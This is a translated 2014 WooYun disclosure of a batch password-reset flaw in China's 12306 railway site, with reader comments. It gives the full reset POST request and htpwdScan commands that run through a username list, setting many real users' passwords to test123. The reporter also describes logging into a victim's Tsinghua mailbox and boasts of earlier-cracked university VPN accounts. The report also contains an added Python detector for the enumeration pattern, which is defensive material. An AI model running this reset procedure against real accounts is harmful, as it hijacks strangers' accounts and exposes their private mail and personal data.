Demonstrating the 12306 batch password-reset vulnerability (multiple users' passwords can be changed)

Report ID: 63813
URL: http://www.wooyun.org/bug.php?action=view&id=63813
Status: fixed by the vendor
Title: Demonstrating the 12306 batch password-reset vulnerability (multiple users' passwords can be changed)
Type: design flaw / logic error
Vendor: 中国铁道科学研究院 (China Academy of Railway Sciences)
White hat: lijiejie
Submitted: 2014-06-06 21:13:00
Published: 2014-06-11 14:41:00
Fixed: 2014-06-11 14:41:00
Confirmed: 2014-06-09 00:00:00
Confirm spend: 3
Tags: logic flaw
Followers: 0
Bookmarks: 0
White hat self-rating: Rank 16
Vendor rating: Rank 4
Vulnerability summary

The vulnerability I previously submitted to 12306 was ignored: http://www.wooyun.org/bugs/wooyun-2014-063025, so I'll give a detailed demonstration of the exploitation method...
Vulnerability details

Before exploiting, ping kyfw.12306.cn, then edit the hosts file so the name resolves to that fixed IP.
POST request:

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1
Host: kyfw.12306.cn
Connection: keep-alive
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000
userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc


Replace the session id and randCodes with your own values.
Download the script I wrote (http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/) and run, in turn:

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug


htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt


In 12306.txt you get the users whose password has been changed to test123.
In the HTTP request above, an additional dictionary can also be set for the answer.
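The traffic pattern the procedure above produces (one client session driving the reset endpoint across many different user_name values, always with the same new password) is straightforward to spot server-side. The following Python detector is an added example, not code from the report or from htpwdScan; it assumes a constructed access-log format of `ip session POST path body` and all log lines and the second endpoint path are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Reset endpoint named in the report; the log format and every log line below are constructed for this example.
RESET_PATH = "/otn/forgetPassword/findPasswordByPromptAnswer"
LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<sid>\S+) POST (?P<path>\S+) (?P<body>\S+)$")

SAMPLE_LOG = "\n".join([
    # one client, one session, walking a username dictionary with the same new password each time
    "198.51.100.7 SESS-A POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=user01&userDTO.password_new=test123",
    "198.51.100.7 SESS-A POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=user02&userDTO.password_new=test123",
    "198.51.100.7 SESS-A POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=user03&userDTO.password_new=test123",
    "198.51.100.7 SESS-A POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=user04&userDTO.password_new=test123",
    # a legitimate user retrying their own reset (same account twice): must not be flagged
    "203.0.113.9 SESS-B POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=alice&userDTO.password_new=N3wPass",
    "203.0.113.9 SESS-B POST " + RESET_PATH + " userDTO.loginUserDTO.user_name=alice&userDTO.password_new=N3wPass",
    # traffic to another (constructed) endpoint is ignored entirely
    "203.0.113.9 SESS-B POST /otn/example/otherEndpoint userDTO.loginUserDTO.user_name=alice",
])


def detect_reset_enumeration(log_text, max_distinct_users=3):
    """Group reset POSTs by (client ip, session id) and flag every client that
    submitted more than max_distinct_users distinct user_name values.
    Returns {(ip, sid): {"requests": n, "users": [...], "new_passwords": [...]}}."""
    per_client = defaultdict(lambda: {"requests": 0, "users": set(), "new_passwords": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("path") != RESET_PATH:
            continue
        params = parse_qs(m.group("body"))
        entry = per_client[(m.group("ip"), m.group("sid"))]
        entry["requests"] += 1
        entry["users"].add(params.get("userDTO.loginUserDTO.user_name", [""])[0])
        entry["new_passwords"].add(params.get("userDTO.password_new", [""])[0])
    flagged = {}
    for key, e in per_client.items():
        if len(e["users"]) > max_distinct_users:
            flagged[key] = {"requests": e["requests"],
                            "users": sorted(e["users"]),
                            "new_passwords": sorted(e["new_passwords"])}
    return flagged


if __name__ == "__main__":
    for (ip, sid), info in detect_reset_enumeration(SAMPLE_LOG).items():
        print(f"{ip} session {sid}: {info['requests']} reset attempts against "
              f"{len(info['users'])} distinct accounts, new password(s) {info['new_passwords']}")
```

In the report the JSESSIONID cookie stays constant across the whole run, so keying the grouping on the session id as well as the IP catches exactly that. A single new password shared across many flagged accounts is the second signal worth alerting on.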

POC

The passwords of all of the following accounts have been changed to test123; don't believe it? Try a few.



I picked an account at random and looked inside (I swear, chosen completely at random), and it turned out to be a Tsinghua mailbox. I casually logged into the mailbox with the phone number and got in with no effort at all, uh... Given that I had long since cracked a number of Tsinghua and Peking University VPN accounts, there was no need to keep playing with Tsinghua.

[Image: 12306_info.png]


[Image: tsinghua_mail.png]


Fix recommendation

You're the experts.

Status history
2014-06-06: details sent to the vendor, awaiting vendor handling
2014-06-09: vendor confirmed; details disclosed to the vendor only
2014-06-11: vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public
Vendor reply: Thanks
Response: severity: low; vulnerability Rank: 4; confirmed: 2014-06-09 08:24
Comments (28 items; each entry gives the comment, then commenter, likes and time)

This blurring... you can still read it with the naked eye...

StarBrilliant (0 likes), 2014-07-12 12:56:00

no zuo no die why you try

芙兰朵露斯卡雷特 (0 likes), 2014-07-01 15:04:00

OP, just sit and wait for the water-meter check.

hawkeye (0 likes), 2014-06-28 17:00:00

@Doze As you can see, they don't take users' information and data very seriously.

lijiejie (0 likes), 2014-06-28 09:40:00

test123 still works

Doze (0 likes), 2014-06-28 08:08:00

Here to learn.

蛋碎酱油 (0 likes), 2014-06-23 16:05:00

Knock knock knock, open the door, the community is here to deliver warmth.

西顾 (0 likes), 2014-06-19 15:07:00

The key point is that these accounts' passwords are still test123.

IT偏执狂 (0 likes), 2014-06-19 11:15:00

Tsinghua's databases have been dumped*, but a lot of them aren't core ones. Is OP heading into the backbone?

Lee Swagger (0 likes), 2014-06-14 00:10:00

The key point is that these accounts' passwords are still test123.

zhangjie (0 likes), 2014-06-12 10:44:00

Given that I had long since cracked a number of Tsinghua and Peking University VPN accounts, there was no need to keep playing with Tsinghua.

小杰哥 (0 likes), 2014-06-11 21:09:00

Given that I had long since cracked a number of Tsinghua and Peking University VPN accounts, there was no need to keep playing with Tsinghua.

xsjswt (0 likes), 2014-06-11 16:48:00

Don't talk security with 12306.

luwikes (0 likes), 2014-06-11 16:25:00

good..

风之传说 (0 likes), 2014-06-11 16:10:00

Next time go after Peking University.

深蓝 (0 likes), 2014-06-11 15:56:00

What's the underlying principle?

计算姬 (0 likes), 2014-06-11 15:42:00

Why do you all love going after Tsinghua, and you've dumped the student data several times over; that's too much, and you don't even share the shell.

动后河 (0 likes), 2014-06-11 15:16:00

"Given that I had long since cracked a number of Tsinghua and Peking University VPN accounts, there was no need to keep playing with Tsinghua" ...OP, watch out for the water-meter check...

小森森 (0 likes), 2014-06-11 15:03:00

OP, when you go out, put on a bulletproof vest and a helmet and such.

nony (0 likes), 2014-06-11 14:56:00

OP, when you hit someone you don't hit the face; keep a low profile.

B1acken (0 likes), 2014-06-07 11:36:00

OP is on the road to getting himself in trouble; isn't this handing 12306 an excuse to come check the water meter?

小杰 (0 likes), 2014-06-07 09:03:00

OP won't give up until he gets the rank.

李旭敏 (0 likes), 2014-06-06 23:47:00

Feel free to slap my face..

zeracker (0 likes), 2014-06-06 22:49:00

Waiting to learn the approach...

Siro (0 likes), 2014-06-06 21:57:00

Reward: one Spring Festival travel-rush train ticket.

迦南 (0 likes), 2014-06-06 21:36:00

What do those below think?

野驴~ (0 likes), 2014-06-06 21:36:00

top~

袋鼠妈妈 (0 likes), 2014-06-06 21:20:00

mark

VIP (0 likes), 2014-06-06 21:17:00